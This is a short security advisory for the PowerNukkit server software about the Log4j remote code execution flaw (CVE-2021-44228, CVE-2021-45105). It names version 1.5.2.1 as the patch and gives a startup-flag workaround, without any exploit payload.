Severity: Critical
CVSS Score: 10
### Summary The version used of Log4j, the library used for logging by PowerNukkit, is subject to a remote code execution vulnerability via the ldap JNDI parser. It's well detailed at [CVE-2021-44228](https://github.com/advisories/GHSA-jfh8-c2jp-5v3q) and CVE-2021-45105(https://github.com/advisories/GHSA-p6xc-xr62-6r2g). ### Impact Malicious client code could be used to send messages and cause remote code execution on the server. ### Patches PowerNukkit `1.5.2.1` is a patch-release that only updates the Log4j version to `2.17.0` and should be used instead of `1.5.2.0`. All versions prior to `1.5.2.1` are affected and are not patched. ### Workarounds If you can't upgrade, you can use the `-Dlog4j2.formatMsgNoLookups=true` startup argument as remediation, as this prevents the vulnerability from happening. ### References https://github.com/advisories/GHSA-jfh8-c2jp-5v3q https://github.com/advisories/GHSA-p6xc-xr62-6r2g ### For more information If you have any questions or comments about this advisory: * Open an issue in [the PowerNukkit repository](https://github.com/PowerNukkit/PowerNukkit/issues)